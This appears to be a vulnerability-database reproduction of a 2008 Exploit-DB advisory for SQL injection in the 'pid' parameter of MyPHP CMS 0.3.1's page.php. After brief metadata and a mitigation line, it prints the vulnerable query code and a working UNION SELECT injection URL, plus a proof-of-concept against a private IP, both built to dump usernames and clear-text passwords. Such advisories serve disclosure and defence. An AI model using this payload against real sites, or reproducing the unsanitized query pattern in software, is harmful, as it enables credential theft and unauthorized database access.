MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability

vendor:

MyPHP CMS

by:

CWH Underground

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: MyPHP CMS

Affected Version From: 2000.3.1

Affected Version To: 2000.3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:myphpcms:myphpcms:0.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability

A vulnerability exists in MyPHP CMS 0.3.1, which allows an attacker to inject arbitrary SQL commands via the 'pid' parameter in the 'page.php' script. Magic Quote must be turned off for the attack to be successful. An attacker can exploit this vulnerability to dump username and password in clear text.

Mitigation:

Ensure that Magic Quote is turned on and that all inputs are properly sanitized.

Source

Exploit-DB raw data:

===============================================================
  MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability
===============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 25 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : MyPHP CMS
 VERSION     : 0.3.1
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/myphpcms
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

---------------------------------
 Vulnerable File [page.php?pid=]
---------------------------------

@Line 

   13:   $psql = "SELECT  * FROM ".$table_prefix."pages WHERE pid='$pid'";
   14:	 $pprocess = mysql_query ( $psql );
   15:	 $prow = mysql_fetch_array ( $pprocess );

---------
 Exploit
---------

[+] http://[Target]/[myphpcms_path]/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/[prefix_users]/**/WHERE/**/uid='1

	This exploit can dump username and password in clear text

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/myphpcms/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/users/**/WHERE/**/uid='1



##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-25]